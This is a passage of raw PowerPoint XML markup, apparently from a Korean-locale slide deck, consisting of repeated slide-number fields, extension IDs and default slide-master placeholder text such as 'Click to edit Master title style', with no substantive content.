      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285717363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65</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383409363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66</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145407525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67</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48778287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68</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320374932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69</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3983479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7</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146339369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70</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29593067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71</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212815711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72</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17202026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73</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171072834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74</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132622454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75</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83825608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76</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136135971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77</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100415211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78</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275266831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79</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3569615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8</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172821750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80</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376089754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81</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306274978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82</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134466817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83</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341079583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84</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134778550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85</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280974998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86</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21472768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87</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143945178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88</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276073823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89</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16559814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ko-KR"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9</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1866691003"/>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90</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35631512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91</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381355442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92</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271162813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93</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295821845"/>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94</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118901426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95</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3038308194"/>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96</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27391418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97</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11274902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98</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274404432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9144846-F983-4C6F-97C9-AD65E8EDCD8F}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152529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rgbClr val="5B5B5B"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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rgbClr val="5B5B5B"/>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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</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2D855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3578793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smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Vertical Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>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4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</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2D855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3351942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ltLang="ko-KR" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</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2D855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1017914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5B5B5B"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</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2D855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" alt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652531" y="6331618"/>
            <a:ext cx="389857" cy="389857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4291304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ltLang="ko-KR" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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ko-KR" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</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2D855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1533335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smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="5181600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1825625"/>
            <a:ext cx="5181600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</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2D855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33242114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ltLang="ko-KR" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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7" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</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2D855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3273890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smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</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2D855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10377333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CF2A71-FBB8-49DB-B000-33DF016BB409}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-06-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D855CA0-3A47-438D-A3A7-68BA9F166092}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
